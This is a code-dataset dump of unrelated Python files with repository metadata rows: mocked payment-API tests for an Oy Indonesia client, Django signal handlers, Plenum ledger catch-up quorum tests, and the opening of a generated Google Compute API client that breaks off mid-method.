assert type(response["amount"]) == int
@patch("oy.core.remote_call.RemoteCall")
def test_disburse_status(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"status": {"code": "000", "message": "Success"},
"amount": 125000,
"recipient_name": "John Doe",
"recipient_bank": "008",
"recipient_account": "1234567890",
"trx_id": "ABC-456",
"partner_trx_id": "1234-asde",
"timestamp": "16-10-2020 10:34:23",
"created_date": "24-01-2020 06:48:08",
"last_updated_date": "24-01-2020 06:48:39",
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.disburse_status("1234-asde")
assert response["recipient_account"]
assert response["recipient_name"]
assert response["recipient_bank"]
assert response["amount"]
assert response["trx_id"]
assert response["partner_trx_id"]
assert response["timestamp"]
assert response["created_date"]
assert response["last_updated_date"]
@patch("oy.core.remote_call.RemoteCall")
def test_get_balance(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"status": {"code": "000", "message": "Success"},
"balance": 125000,
"timestamp": "10-12-2019 12:15:37",
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.get_balance()
assert response["balance"]
@patch("oy.core.remote_call.RemoteCall")
def test_generate_va(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"id": "12345b1-23be-45670-a123-5ca678f12b3e",
"status": {"code": "000", "message": "Success"},
"amount": 10000,
"va_number": "123456789182827272",
"bank_code": "002",
"is_open": False,
"is_single_use": False,
"expiration_time": 1582783668175,
"va_status": "WAITING_PAYMENT",
"username_display": "va name",
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.generate_va("002", "500000", "oy00000001")
assert response["amount"] == 10000
assert response["va_number"] == "123456789182827272"
assert response["bank_code"] == "002"
assert response["is_open"] is False
assert response["is_single_use"] is False
assert response["expiration_time"] == 1582783668175
assert response["va_status"] == "WAITING_PAYMENT"
assert response["username_display"] == "va name"
@patch("oy.core.remote_call.RemoteCall")
def test_get_va(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"id": "12345b1-23be-45670-a123-5ca678f12b3e",
"status": {"code": "000", "message": "Success"},
"amount": 10000,
"va_number": "123456789182827272",
"bank_code": "002",
"is_open": False,
"is_single_use": False,
"expiration_time": 1582783668175,
"va_status": "WAITING_PAYMENT",
"username_display": "va name",
"amount_detected": 0,
"partner_user_id": "123456",
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.get_va_info("12345b1-23be-45670-a123-5ca678f12b3e")
assert response["amount"] == 10000
assert response["va_number"] == "123456789182827272"
assert response["bank_code"] == "002"
assert response["is_open"] is False
assert response["is_single_use"] is False
assert response["expiration_time"] == 1582783668175
assert response["va_status"] == "WAITING_PAYMENT"
assert response["username_display"] == "va name"
assert response["amount_detected"] == 0
assert response["partner_user_id"] == "123456"
@patch("oy.core.remote_call.RemoteCall")
def test_update_va(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"id": "1414255-12121-21212121-212121",
"status": {"code": "000", "message": "Success"},
"amount": 50000,
"va_number": "1001234000000000001",
"bank_code": "002",
"is_open": True,
"is_single_use": False,
"expiration_time": 1582802205412,
"va_status": "WAITING_PAYMENT",
"username_display": "vaname",
"partner_user_id": "12345677",
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.update_va(
"1414255-12121-21212121-212121", 50000, True, False, 60, False
)
assert response["amount"] == 50000
assert response["va_number"] == "1001234000000000001"
assert response["bank_code"] == "002"
assert response["is_open"] is True
assert response["is_single_use"] is False
assert response["expiration_time"] == 1582802205412
assert response["va_status"] == "WAITING_PAYMENT"
assert response["username_display"] == "vaname"
assert response["partner_user_id"] == "12345677"
@patch("oy.core.remote_call.RemoteCall")
def test_get_list_of_va(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"total": 2,
"data": [
{
"id": "9a660428-3373-436b-b929-ef69698dd26f",
"amount": 12000.0000,
"va_number": "100536000000000006",
"bank_code": "002",
"is_open": True,
"is_single_use": False,
"expiration_time": 1582791896416,
"va_status": "EXPIRED",
"username_display": "username",
"amount_detected": 400000,
"partner_user_id": "12345",
},
{
"id": "de51383f-1557-409c-8542-dcb74ca76375",
"amount": 12000.0000,
"va_number": "100536000000000005",
"bank_code": "002",
"is_open": True,
"is_single_use": False,
"expiration_time": 1582790250609,
"va_status": "EXPIRED",
"username_display": "username",
"amount_detected": 500000,
"partner_user_id": "54321",
},
],
"status": {"code": "000", "message": "Success"},
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.get_list_of_va()
assert response["total"] == 2
assert len(response["data"]) == 2
@patch("oy.core.remote_call.RemoteCall")
def test_get_list_of_va_transactions(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response={
"total": 2,
"data": [
{
"id": "9a660428-3373-436b-b929-ef69698dd26f",
"amount": 12000.0000,
"va_number": "100536000000000006",
"bank_code": "002",
"is_open": True,
"is_single_use": False,
"expiration_time": 1582791896416,
"va_status": "EXPIRED",
"username_display": "username",
"amount_detected": 400000,
"partner_user_id": "12345",
},
{
"id": "de51383f-1557-409c-8542-dcb74ca76375",
"amount": 12000.0000,
"va_number": "100536000000000005",
"bank_code": "002",
"is_open": True,
"is_single_use": False,
"expiration_time": 1582790250609,
"va_status": "EXPIRED",
"username_display": "username",
"amount_detected": 500000,
"partner_user_id": "54321",
},
],
"status": {"code": "000", "message": "Success"},
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.get_list_of_va()
assert response["total"] == 2
assert len(response["data"]) == 2
@patch("oy.core.remote_call.RemoteCall")
def test_get_list_of_va_transactions(mock_remote_call, setup_request, setup_response):
# mock fetch method on remote call as the same one as mock response
# respresantion
mock_response = setup_response(
response = {
"id": "12345676788898",
"status": {
"code": "000",
"message": "Success"
},
"data": [
{
"id": "d9c2963f-be14-4558-9380-5ba1db8ed156",
"created": "2020-02-27 07:48:01",
"name": "Static VA by username",
"amount": 10000,
"create_by": "Static VA by username",
"last_update_by": "Static VA by username",
"last_updated": 1582789681439,
"admin_fee": 1000,
"va_number": "123456000000000001"
}
],
"number_of_transaction": 1
}
)
mock_remote_call.fetch.return_value = mock_response.to_representation()
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
response = provider.get_list_of_va_transactions("12345676788898")
assert response["number_of_transaction"] == 1
assert len(response["data"]) == 1
@patch("oy.core.remote_call.RemoteCall")
def test_inquiry_account_error(mock_remote_call, setup_request, setup_response):
""" simulate inquiry account receive status error """
mock_remote_call.fetch.side_effect = StatusCodeError
provider = OyProvider(
request=setup_request,
response=setup_response,
remote_call=mock_remote_call,
base_url="https://sandbox.oyindonesia.com/staging/partner",
)
with pytest.raises(ProviderError):
provider.inquiry_account("014", "1239812390")
| 35.705036 | 86 | 0.610786 | 1,560 | 14,889 | 5.576282 | 0.126282 | 0.074721 | 0.05311 | 0.021497 | 0.837568 | 0.816071 | 0.785378 | 0.780894 | 0.76595 | 0.745948 | 0 | 0.098423 | 0.271879 | 14,889 | 416 | 87 | 35.790865 | 0.703994 | 0.058768 | 0 | 0.670487 | 0 | 0 | 0.287696 | 0.051333 | 0 | 0 | 0 | 0 | 0.151862 | 1 | 0.031519 | false | 0 | 0.017192 | 0 | 0.048711 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
139547c2c0adbd703d502e2a7aea5f37b984df96 | 216 | py | Python | blog/signals.py | MarkusH/talk-django-elasticsearch | cc6aad93f1cc4b4abc6d2517fa6efab1c12c522e | [
"BSD-3-Clause"
] | 6 | 2015-03-11T16:58:00.000Z | 2016-08-26T06:17:59.000Z | blog/signals.py | MarkusH/talk-django-elasticsearch | cc6aad93f1cc4b4abc6d2517fa6efab1c12c522e | [
"BSD-3-Clause"
] | 3 | 2020-02-11T22:15:41.000Z | 2021-06-01T21:44:15.000Z | blog/signals.py | MarkusH/talk-django-elasticsearch | cc6aad93f1cc4b4abc6d2517fa6efab1c12c522e | [
"BSD-3-Clause"
] | 1 | 2015-10-12T21:50:13.000Z | 2015-10-12T21:50:13.000Z | from . import tasks
def post_save_article(sender, instance, **kwargs):
tasks.index_article.delay(instance.pk)
def post_delete_article(sender, instance, **kwargs):
tasks.unindex_article.delay(instance.pk)
| 21.6 | 52 | 0.763889 | 29 | 216 | 5.482759 | 0.517241 | 0.08805 | 0.264151 | 0.339623 | 0.402516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12037 | 216 | 9 | 53 | 24 | 0.836842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
13b7aac30c15112a1d7c823a8effa406a9ae3561 | 13,057 | py | Python | plenum/test/node_catchup/test_same_ledger_initial_catchup.py | rhzs/indy-plenum | a1ee6f3d081e802b404637026dc6f8ef3ec82a40 | [
"Apache-2.0"
] | null | null | null | plenum/test/node_catchup/test_same_ledger_initial_catchup.py | rhzs/indy-plenum | a1ee6f3d081e802b404637026dc6f8ef3ec82a40 | [
"Apache-2.0"
] | null | null | null | plenum/test/node_catchup/test_same_ledger_initial_catchup.py | rhzs/indy-plenum | a1ee6f3d081e802b404637026dc6f8ef3ec82a40 | [
"Apache-2.0"
] | 1 | 2020-01-24T09:36:13.000Z | 2020-01-24T09:36:13.000Z | import pytest
# noinspection PyUnresolvedReferences
from ledger.test.conftest import tempdir, txn_serializer, hash_serializer # noqa
from plenum.common.constants import LedgerState
from plenum.common.messages.node_messages import LedgerStatus
nodeCount = 7
ledger_id = 1
@pytest.yield_fixture(scope="function")
def node_and_ledger_info(txnPoolNodeSet):
'''
Emulate restart of the node (clean state)
'''
node = txnPoolNodeSet[0]
node.master_replica.last_ordered_3pc = (0, 0)
view_changer = node.view_changer
view_changer.propagate_primary = True
view_changer.view_no = 0
view_changer.view_change_in_progress = True
view_changer.set_defaults()
ledger_manager = node.ledgerManager
ledger_manager.last_caught_up_3PC = (0, 0)
ledger_info = ledger_manager.getLedgerInfoByType(ledger_id)
ledger_info.set_defaults()
ledger_info.canSync = True
ledger_status = node.build_ledger_status(ledger_id)
assert ledger_status.viewNo is None
assert ledger_status.ppSeqNo is None
return node, ledger_manager, ledger_info, ledger_status
def test_same_ledger_status_quorum(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that we require at least n-f-1 (=4) same LedgerStatus msgs
to finish CatchUp
'''
node, ledger_manager, ledger_info, ledger_status = node_and_ledger_info
status_from = set()
for i in range(3):
node_name = txnPoolNodeSet[i + 1].name
ledger_manager.processLedgerStatus(ledger_status, node_name)
status_from = status_from.union({node_name})
assert ledger_info.ledgerStatusOk == status_from
assert ledger_info.canSync is True
assert ledger_info.state == LedgerState.not_synced
node_name = txnPoolNodeSet[4].name
ledger_manager.processLedgerStatus(ledger_status, node_name)
assert ledger_info.ledgerStatusOk == set()
assert ledger_info.canSync is False
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_same_3PC(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
if all LedgerStatus msgs have the same not None 3PC keys
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_status_2_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
2, 20,
ledger_status_none_3PC.merkleRoot)
ledger_manager.processLedgerStatus(ledger_status_2_40, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_2_40, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_2_40, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_2_40, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (2, 20)
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_same_None_3PC(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
if all LedgerStatus msgs have the same None 3PC keys (like at the initial start of the pool)
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_one_not_none_3PC_last(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
if all LedgerStatus msgs have the same None 3PC keys except the last one.
The last msg contains not None 3PC, but it's not enough for setting last_ordered_3PC
since the quorum is f+1 (=3)
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
3, 40,
ledger_status_none_3PC.merkleRoot)
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_one_not_none_3PC_first(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
if all LedgerStatus msgs have the same None 3PC keys except the first one.
The first msg contains not None 3PC, but it's not enough for setting last_ordered_3PC
since the quorum is f+1 (=3)
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
3, 40,
ledger_status_none_3PC.merkleRoot)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_quorum_with_none(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
if all LedgerStatus msgs have the same not None 3PC keys except the last one.
The last msg contains None 3PC, but not None from the previous msgs is used
since we have a quorum of f+1 (=3)
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
3, 40,
ledger_status_none_3PC.merkleRoot)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_none_3PC, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (3, 40)
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_quorum1(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
if all LedgerStatus msgs have the same not None 3PC keys except the last one.
The last msg contains a different not None 3PC, but 3PC from the previous msgs is used
since we have a quorum of f+1 (=3)
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_status_1_10 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
1, 10,
ledger_status_none_3PC.merkleRoot)
ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
3, 40,
ledger_status_none_3PC.merkleRoot)
ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (1, 10)
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_quorum2(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs
if all LedgerStatus msgs have the same not None 3PC keys except the last one.
The last msg contains a different not None 3PC, but 3PC from the previous msgs is used
since we have a quorum of f+1 (=3)
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_status_1_10 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
1, 10,
ledger_status_none_3PC.merkleRoot)
ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
3, 40,
ledger_status_none_3PC.merkleRoot)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (3, 40)
assert ledger_info.state == LedgerState.synced
def test_same_ledger_status_last_ordered_not_none_3PC_no_quorum_equal(txnPoolNodeSet,
node_and_ledger_info):
'''
Check that last_ordered_3PC is set according to 3PC from LedgerStatus msgs.
Check that if we have no quorum (2 different keys, but 3 is required ror quorum), then
they are not used.
'''
node, ledger_manager, ledger_info, ledger_status_none_3PC = node_and_ledger_info
ledger_status_1_10 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
1, 10,
ledger_status_none_3PC.merkleRoot)
ledger_status_3_40 = LedgerStatus(ledger_status_none_3PC.ledgerId,
ledger_status_none_3PC.txnSeqNo,
3, 40,
ledger_status_none_3PC.merkleRoot)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[1].name)
ledger_manager.processLedgerStatus(ledger_status_3_40, txnPoolNodeSet[2].name)
ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[3].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.not_synced
ledger_manager.processLedgerStatus(ledger_status_1_10, txnPoolNodeSet[4].name)
assert node.master_last_ordered_3PC == (0, 0)
assert ledger_info.state == LedgerState.synced
| 47.137184 | 96 | 0.691353 | 1,616 | 13,057 | 5.227723 | 0.08354 | 0.137784 | 0.092803 | 0.110204 | 0.863163 | 0.852628 | 0.844579 | 0.825639 | 0.810014 | 0.788352 | 0 | 0.033146 | 0.249062 | 13,057 | 276 | 97 | 47.307971 | 0.828455 | 0.152409 | 0 | 0.684524 | 0 | 0 | 0.000738 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 1 | 0.059524 | false | 0 | 0.02381 | 0 | 0.089286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13d80af739ee073afce7f8822f149ba348f1c2a3 | 63 | py | Python | menpofit/clm/algorithm/__init__.py | yuxiang-zhou/menpofit | a74d87df8979c683019ea518bcf7729a76cc603d | [
"BSD-3-Clause"
] | 220 | 2019-09-01T01:52:04.000Z | 2022-03-28T12:52:07.000Z | menpofit/clm/algorithm/__init__.py | yuxiang-zhou/menpofit | a74d87df8979c683019ea518bcf7729a76cc603d | [
"BSD-3-Clause"
] | 80 | 2015-01-05T16:17:39.000Z | 2020-11-22T13:42:00.000Z | menpofit/clm/algorithm/__init__.py | yuxiang-zhou/menpofit | a74d87df8979c683019ea518bcf7729a76cc603d | [
"BSD-3-Clause"
] | 64 | 2015-02-02T15:11:38.000Z | 2022-02-28T06:19:31.000Z | from .gd import ActiveShapeModel, RegularisedLandmarkMeanShift
| 31.5 | 62 | 0.888889 | 5 | 63 | 11.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079365 | 63 | 1 | 63 | 63 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
13e3fad8fd603fa4143e12776396c07d3b3aafa9 | 334,389 | py | Python | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/v1/compute_v1_client.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/v1/compute_v1_client.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/v1/compute_v1_client.py | bopopescu/searchparty | afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6 | [
"Apache-2.0"
] | 3 | 2017-07-27T18:44:13.000Z | 2020-07-25T17:48:53.000Z | """Generated client library for compute version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.compute.v1 import compute_v1_messages as messages
class ComputeV1(base_api.BaseApiClient):
"""Generated client library for service compute version v1."""
MESSAGES_MODULE = messages
BASE_URL = u'https://www.googleapis.com/compute/v1/'
_PACKAGE = u'compute'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/compute', u'https://www.googleapis.com/auth/compute.readonly', u'https://www.googleapis.com/auth/devstorage.full_control', u'https://www.googleapis.com/auth/devstorage.read_only', u'https://www.googleapis.com/auth/devstorage.read_write']
_VERSION = u'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'ComputeV1'
_URL_VERSION = u'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new compute handle."""
url = url or self.BASE_URL
super(ComputeV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.acceleratorTypes = self.AcceleratorTypesService(self)
self.addresses = self.AddressesService(self)
self.autoscalers = self.AutoscalersService(self)
self.backendBuckets = self.BackendBucketsService(self)
self.backendServices = self.BackendServicesService(self)
self.diskTypes = self.DiskTypesService(self)
self.disks = self.DisksService(self)
self.firewalls = self.FirewallsService(self)
self.forwardingRules = self.ForwardingRulesService(self)
self.globalAddresses = self.GlobalAddressesService(self)
self.globalForwardingRules = self.GlobalForwardingRulesService(self)
self.globalOperations = self.GlobalOperationsService(self)
self.healthChecks = self.HealthChecksService(self)
self.httpHealthChecks = self.HttpHealthChecksService(self)
self.httpsHealthChecks = self.HttpsHealthChecksService(self)
self.images = self.ImagesService(self)
self.instanceGroupManagers = self.InstanceGroupManagersService(self)
self.instanceGroups = self.InstanceGroupsService(self)
self.instanceTemplates = self.InstanceTemplatesService(self)
self.instances = self.InstancesService(self)
self.licenses = self.LicensesService(self)
self.machineTypes = self.MachineTypesService(self)
self.networks = self.NetworksService(self)
self.projects = self.ProjectsService(self)
self.regionAutoscalers = self.RegionAutoscalersService(self)
self.regionBackendServices = self.RegionBackendServicesService(self)
self.regionCommitments = self.RegionCommitmentsService(self)
self.regionInstanceGroupManagers = self.RegionInstanceGroupManagersService(self)
self.regionInstanceGroups = self.RegionInstanceGroupsService(self)
self.regionOperations = self.RegionOperationsService(self)
self.regions = self.RegionsService(self)
self.routers = self.RoutersService(self)
self.routes = self.RoutesService(self)
self.snapshots = self.SnapshotsService(self)
self.sslCertificates = self.SslCertificatesService(self)
self.subnetworks = self.SubnetworksService(self)
self.targetHttpProxies = self.TargetHttpProxiesService(self)
self.targetHttpsProxies = self.TargetHttpsProxiesService(self)
self.targetInstances = self.TargetInstancesService(self)
self.targetPools = self.TargetPoolsService(self)
self.targetSslProxies = self.TargetSslProxiesService(self)
self.targetTcpProxies = self.TargetTcpProxiesService(self)
self.targetVpnGateways = self.TargetVpnGatewaysService(self)
self.urlMaps = self.UrlMapsService(self)
self.vpnTunnels = self.VpnTunnelsService(self)
self.zoneOperations = self.ZoneOperationsService(self)
self.zones = self.ZonesService(self)
class AcceleratorTypesService(base_api.BaseApiService):
"""Service class for the acceleratorTypes resource."""
_NAME = u'acceleratorTypes'
def __init__(self, client):
super(ComputeV1.AcceleratorTypesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of accelerator types.
Args:
request: (ComputeAcceleratorTypesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AcceleratorTypeAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.acceleratorTypes.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/acceleratorTypes',
request_field='',
request_type_name=u'ComputeAcceleratorTypesAggregatedListRequest',
response_type_name=u'AcceleratorTypeAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified accelerator type. Get a list of available accelerator types by making a list() request.
Args:
request: (ComputeAcceleratorTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AcceleratorType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.acceleratorTypes.get',
